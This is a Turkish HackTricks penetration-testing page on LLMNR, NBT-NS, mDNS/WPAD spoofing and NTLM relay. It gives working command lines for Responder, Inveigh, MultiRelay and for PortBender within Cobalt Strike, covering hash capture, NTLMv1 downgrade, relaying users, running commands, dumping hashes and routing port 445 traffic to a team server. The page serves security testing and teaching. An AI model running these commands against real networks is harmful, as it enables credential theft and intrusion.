HackTricksLLMNR, NBT-NS, mDNS/DNS ve WPAD Spoofing ve Relay Saldırıları
Reading time: 6 minutes
tip
AWS Hacking'i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.
Ağ Protokolleri
Yerel Ana Bilgisayar Çözümleme Protokolleri
- LLMNR, NBT-NS ve mDNS:
- Microsoft ve diğer işletim sistemleri, DNS başarısız olduğunda yerel ad çözümlemesi için LLMNR ve NBT-NS kullanır. Benzer şekilde, Apple ve Linux sistemleri mDNS kullanır.
- Bu protokoller, UDP üzerinden kimlik doğrulaması yapılmamış, yayın doğası nedeniyle dinlemeye ve sahtelemeye karşı hassastır.
- Responder, bu protokolleri sorgulayan ana bilgisayarlara sahte yanıtlar göndererek hizmetleri taklit etmek için kullanılabilir.
- Responder kullanarak hizmet taklitine dair daha fazla bilgi burada bulunabilir.
Web Proxy Otomatik Keşif Protokolü (WPAD)
- WPAD, tarayıcıların proxy ayarlarını otomatik olarak keşfetmesine olanak tanır.
- Keşif, DHCP, DNS veya DNS başarısız olursa LLMNR ve NBT-NS'ye geri dönerek sağlanır.
- Responder, WPAD saldırılarını otomatikleştirerek istemcileri kötü niyetli WPAD sunucularına yönlendirebilir.
Protokol Zehirleme için Responder
- Responder, LLMNR, NBT-NS ve mDNS sorgularını zehirlemek için kullanılan bir araçtır, sorgu türlerine göre seçici yanıt vererek, esas olarak SMB hizmetlerini hedef alır.
- Kali Linux'ta önceden yüklenmiştir,
/etc/responder/Responder.confdosyasında yapılandırılabilir. - Responder, yakalanan hash'leri ekranda gösterir ve bunları
/usr/share/responder/logsdizinine kaydeder. - Hem IPv4 hem de IPv6'yı destekler.
- Responder'ın Windows sürümü burada mevcuttur.
Responder'ı Çalıştırma
- Varsayılan ayarlarla Responder'ı çalıştırmak için:
responder -I <Interface> - Daha agresif sorgulama için (potansiyel yan etkilerle birlikte):
responder -I <Interface> -P -r -v - NTLMv1 zorlukları/yanıtlarını daha kolay kırmak için yakalamak için teknikler:
responder -I <Interface> --lm --disable-ess - WPAD taklidi şu şekilde etkinleştirilebilir:
responder -I <Interface> --wpad - NetBIOS istekleri saldırganın IP'sine çözülebilir ve bir kimlik doğrulama proxy'si kurulabilir:
responder.py -I <interface> -Pv
Responder ile DHCP Zehirleme
- DHCP yanıtlarını sahtelemek, bir kurbanın yönlendirme bilgilerini kalıcı olarak zehirleyebilir ve ARP zehirlemesine göre daha gizli bir alternatif sunar.
- Hedef ağın yapılandırması hakkında kesin bilgi gerektirir.
- Saldırıyı çalıştırma:
./Responder.py -I eth0 -Pdv - Bu yöntem, NTLMv1/2 hash'lerini etkili bir şekilde yakalayabilir, ancak ağ kesintisini önlemek için dikkatli bir şekilde ele alınması gerekir.
Responder ile Kimlik Bilgilerini Yakalama
- Responder, yukarıda belirtilen protokolleri kullanarak hizmetleri taklit edecek ve bir kullanıcı sahte hizmetlere karşı kimlik doğrulama yapmaya çalıştığında kimlik bilgilerini (genellikle NTLMv2 Challenge/Response) yakalayacaktır.
- Daha kolay kimlik bilgisi kırma için NetNTLMv1'e düşürme veya ESS'yi devre dışı bırakma girişimleri yapılabilir.
Bu tekniklerin yasal ve etik bir şekilde uygulanması, uygun yetkilendirme sağlanması ve kesinti veya yetkisiz erişimden kaçınılması açısından kritik öneme sahiptir.
Inveigh
Inveigh, Windows sistemleri için tasarlanmış bir penetrasyon test cihazı ve kırmızı takım aracı. Responder ile benzer işlevler sunarak sahteleme ve adam ortada saldırıları gerçekleştirir. Araç, bir PowerShell betiğinden C# ikili dosyasına evrim geçirmiştir ve Inveigh ve InveighZero ana sürümleridir. Ayrıntılı parametreler ve talimatlar wiki sayfasında bulunabilir.
Inveigh, PowerShell üzerinden çalıştırılabilir:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Veya bir C# ikili dosyası olarak çalıştırıldı:
Inveigh.exe
NTLM Relay Attack
Bu saldırı, hedef bir makineye erişmek için SMB kimlik doğrulama oturumlarını kullanır ve başarılı olursa bir sistem kabuğu sağlar. Ana gereksinimler şunlardır:
- Kimlik doğrulayan kullanıcının, yönlendirilmiş ana bilgisayarda Yerel Yönetici erişimine sahip olması gerekir.
- SMB imzalama devre dışı bırakılmalıdır.
445 Port Yönlendirme ve Tünelleme
Doğrudan ağ tanıtımının mümkün olmadığı senaryolarda, 445 numaralı porttaki trafik yönlendirilip tünellenmelidir. PortBender gibi araçlar, yerel yönetici erişimi mevcut olduğunda sürücü yükleme için gerekli olan 445 numaralı port trafiğini başka bir porta yönlendirmeye yardımcı olur.
PortBender kurulumu ve Cobalt Strike'daki çalışması:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
NTLM Relay Saldırısı için Diğer Araçlar
- Metasploit: Proxy'ler, yerel ve uzak ana bilgisayar ayrıntıları ile yapılandırılmıştır.
- smbrelayx: SMB oturumlarını iletmek ve komutları çalıştırmak veya arka kapılar dağıtmak için bir Python betiği.
- MultiRelay: Belirli kullanıcıları veya tüm kullanıcıları iletmek, komutları çalıştırmak veya hash'leri dökmek için Responder paketinden bir araç.
Her araç, gerekirse bir SOCKS proxy üzerinden çalışacak şekilde yapılandırılabilir, dolaylı ağ erişimi ile bile saldırılara olanak tanır.
MultiRelay İşlemi
MultiRelay, belirli IP'leri veya kullanıcıları hedef alarak /usr/share/responder/tools dizininden çalıştırılır.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
Bu araçlar ve teknikler, çeşitli ağ ortamlarında NTLM Relay saldırıları gerçekleştirmek için kapsamlı bir set oluşturur.
NTLM Girişlerini Zorla
Windows'ta bazı ayrıcalıklı hesapların rastgele makinelere kimlik doğrulaması yapmasını zorlayabilirsiniz. Nasıl yapılacağını öğrenmek için aşağıdaki sayfayı okuyun:
Force NTLM Privileged Authentication
Referanslar
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.